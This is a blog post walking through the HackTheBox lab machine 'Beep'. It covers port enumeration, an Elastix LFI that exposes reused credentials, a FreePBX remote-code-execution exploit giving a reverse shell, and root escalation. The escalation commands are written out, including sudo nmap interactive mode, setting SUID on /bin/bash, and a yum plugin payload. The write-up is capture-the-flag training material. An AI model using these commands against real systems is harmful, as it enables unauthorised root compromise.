Open in app

Sign in

Write

Sign in

HackTheBox — Beep : Unfinished…

mrZud0k0rn
8 min readApr 4, 2021

--

Rated as easy in HT, and machine running on Linux. I have added the IP on my /etc/hosts file, let’s dive in.

Start by scanning the available ports we can work on. I always run masscan and nmap port scan for good measure.

masscan -i tun0 -p0–65535 — interactive 10.10.10.7

nmap -p- — stylesheet /opt/nmap-bootstrap-xsl/nmap-bootstrap.xsl -oA nmap/portScan beep.htb

So, we got 16 ports available, that’s a lot of enumeration, and since box is rated easy, perhaps we will find multiple vulnerabilities we can exploit?

Let’s run autorecon by Tib3rius

autorecon beep.htb

So, while autorecon is running, let’s also run nmap version/detailed scan

nmap -sV -sC -p4559,80,993,143,443,995,25,110,3306,5038,878,111,4190,4445,10000,22 — stylesheet /opt/nmap-bootstrap-xsl/nmap-bootstrap.xsl -oA nmap/detailedScan beep.htb -vv

So, summarizing the port.

Port 22 : OpenSSH 4.3 (protocol 2.0)
Port 25 : Postfix smtpd
Port 80/443 : Apache httpd 2.2.3 (CentOS)
Port 110 : pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
Port 111 : RPC Port
Port 143 : Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
Port 878 : RPC Port
Port 993 : Cyrus imapd
Port 995 : Cyrus pop3d
Port 3306 : mySQL
Port 4190 : Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
Port 4445 : upnotifyp?
Port 4559 : HylaFAX 4.3.10
Port 5038 : Asterisk Call Manager 1.1
Port 10000 : MiniServ 1.570 (Webmin httpd)

That’s a lot of ports and I don’t know where to begin with, I read through the results of autorecon and the ports that stands out to me were ports

Port 25 : Postfix smtpd
Port 80/443 : Apache httpd 2.2.3 (CentOS)
Port 5038 : Asterisk Call Manager 1.1
Port 10000 : MiniServ 1.570 (Webmin httpd)

Port 80/443

Visiting port 80, I was redirected to port 443, it says about elastix on the login page. I don’t have credentials on hand yet.

>insert welcome page here<

I was thinking that since it was rated as easy, maybe there are already public exploits available against the applicatons.

So I searched for the keyword “elastix” in searchsploit…

searchsploit elastix

There are multiple exploits found, couple of XSS exploit, which we are not interested for now, and what stands out for me was the LFI (local file injection) and RCE (remote code execution).

let’s copy those exploit to our present working directory…

LFI

searchsploit -m php/webapps/37637.pl

Reading through the exploit, it says something about the directory “vtigercrm”

which I believe was not found by my gobuster through autorecon…

I ran the exploit and supplied the target IP, but it didn’t work.

So I manually put the url on my browser together with my burp running..

and I successfully exploited the LFI vulnerability, reading through the response we got some credentials recovered..

One obvious thing about the file is how it re-used the password on all accounts inside.

Let’s take note of the password for now, and see if we can read /etc/passwd and /etc/shadow file.

I successfully read the /etc/passwd but the with /etc/shadow..

So, right now, we got some credentials on hand, but we need some kind of reverse shell or remote connection to the server as our initial foothold…

RCE

Included in the list on searchsploit is the python exploit which lead to RCE, we can exploit this to make our target machine throw a reverse shell back to us..

We can get the version of PBX, by going to /admin and enter credentials mutiple times, it will show us that we are not authorized, but we can get the application version

We got FreePBX 2.8.1.4, and the exploit we got before was for later version FreePBX 2.10.x…

So I downloaded the file..

searchsploit -m >path.of.exploit<

searchsploit -m php/webapps/18650.py

Opening the file, we can see that we need to change some parameters and the command inside the file tells us that the exploit will run a reverse shell on the target machine

The file also gives hint how to root the machine. Sweet!

I changed the IPs and port so I can make a remote connection, I also opened a netcat lister to catch the reverse shell, but upon running the script…

I got an error about about unsupported protocol.. googling the error lead me to something about the ssl version of my target to mine..

So, I tried to sslscan the box, it was only using SSLV3 and TLSv1.0, relatively old technologies.

I edit my /etc/ssl/openssl.cnf file, and edited 2 parameters, the minimum protocal and cipher string.

I set it to none, so it would allow my machine to accept and talk with old and insecure SSL/TLS technologies

I tried to run the exploit again and now got a new error about my target’s certificate..

Googling the error, lead mo to change the script again, I issued an “import ssl” then I added this line to the script

So, I ran again the exploit again, this time I got no error but I also got no response.. I now taught that this has something to do with the extension parameter on the script..

Googling about PBX extension I found this article helpful about hacking pbx phone, thus the name ‘BEEP’.

Luckily we have svwar tool installed.

I issued the command

svwar -e 100–999 -m INVITE 10.10.10.7

and I got results with ‘weird’ response but 1 ‘reauth’, may be this was the extension we can use for our exploit.

I edited the exploit again that it looks something like this now.

I ran the exploit and finally, this time I got a reverse shell!

Privilege Escalation

Let’s spawn a more interactive shell, by issuing

python -c “import pty;pty.spawn(‘/bin/bash’)”

now that we got a more interactive shell, let’s run sudo -l

sudo -l

There a lot of possible ways to privesc.

Visit gtfobins website on how to exploit those binaries. Let’s try the hint on out script and couple of binaries..

NMAP

run nmap with ‘ — interactive’ flag, then to escape the nmap with elevated privilege, issue ‘!sh’

sudo nmap — interactive

CHMOD

This is prettry straight forward, we can change the file permission of /etc/passwd and /etc/shadow files, and insert a backdoor or crack the password.

But let’s try to change the permission of bash binary, let’s set the SUID bit and spawn a persistent eleveted shell.

set the SUID by…

sudo /bin/chmod +s /bin/bash

then run a persistent shell by /bin/bash -p

YUM

Checking the binary…

It says here that we can create a tmp folder, put some files with plugin commands and along those line of plugin, we will insert the malicious “os.exec(‘/bin/sh’, ‘/bin/sh’)” line which will spawn an elevated privilege shell.

TF=$(mktemp -d) << this will create a temporary directorycat >$TF/x<<EOF << this will create file named 'x' inside '$TF' folderplugins=1 << commands inside x file
pluginpath=$TF << commands inside x file
pluginconfpath=$TF << commands inside x file
EOF << will terminate the editor.cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

So after making, the necessary files, we execute yum by…

sudo yum -c $TF/x — enableplugin=y

and we are root again!

Grab the flags.

sudo yum -c $TF/x — enableplugin=y

NOTE : I will try to add more exploit vector, I want to learn about other ports I listed above, setting a reminder so I can work with other ports and learn new things on my free time :)

Takeaways :

  1. Enumeration is not only about enumerating the target machine’s files, ports and services, it is also about enumerating possible exploits agains the machine/applicaiton/service you are working against. I would like to remind myself to, spend time reading the scripts and exploits.

Note: more takeaways as I finish the box..

Linux
Lfi
Pbx Hacking
Sudo

--

--

mrZud0k0rn

Written by mrZud0k0rn

5 Followers

“He-who-must-NOT-be-named”

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams